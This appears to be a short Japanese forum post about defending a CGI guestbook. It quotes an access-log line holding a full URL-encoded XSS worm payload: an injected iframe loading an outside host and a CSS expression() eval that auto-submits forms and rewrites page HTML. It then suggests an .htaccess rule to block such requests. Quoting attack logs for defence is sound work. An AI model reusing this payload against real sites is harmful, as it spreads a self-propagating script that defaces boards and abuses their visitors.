> > アクセスログのほうがいいです
> [27/Sep/2008:04:05:00 +0900] "GET /cgi-bin/bbs.cgi?mode=i&d=30&i=a&
> u=iframe+onload%3dmmm.document.forms[0]
> .v.value%3dMath.floor(Math.random()*65536);mmm.document.forms[0].submit();
> +name%3dmmm+src%3dhttp://qwerty.on.arena.ne.jp
> /cgi-binbbs.cgi&count=if(document.forms[0].d.value%3d%3d30)
> {l%3dString.fromCharCode(60);r%3dString.fromCharCode(62);
> document.getElementsByTagName(document.forms[0].i.value)
> .item(1).innerHTML%3dl%2bdocument.forms[0].u.value%2br;
> document.forms[0].d.value%3d123}&c=+style%3d
> {a:expression(eval(document.forms[0].count.value))}+%81 HTTP/1.1" 200
> 　( )
> (;'x')ﾉ こんな感じにょろ。
> 　　　　一番直近の。

.htaccesでQUERY_STRINGに"randam"があった場合弾くようにするしかないんじゃないかな(;´Д`)

参考：2008/09/27(土)04時07分39秒